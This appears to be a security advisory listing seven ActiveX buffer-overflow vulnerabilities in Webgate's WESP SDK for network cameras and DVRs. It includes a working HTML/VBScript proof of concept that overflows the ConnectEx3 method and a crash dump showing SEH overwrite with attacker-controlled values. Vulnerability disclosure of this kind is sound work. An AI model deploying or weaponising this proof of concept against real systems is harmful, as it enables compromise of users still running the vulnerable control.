Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.
WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both
network DVR and network camera.
Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc
http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html
Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage
Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword
Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX
LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX
Connect Buffer Overflow
Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect
Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX
ConnectEx3 Buffer Overflow
CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0
******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>
arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"
target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020
Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP
ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
P.S. CERT tried to coordinate with the vendor for fixing the issues but
there wasn't any response from vendor
Best Regards,
Praveen Darshanam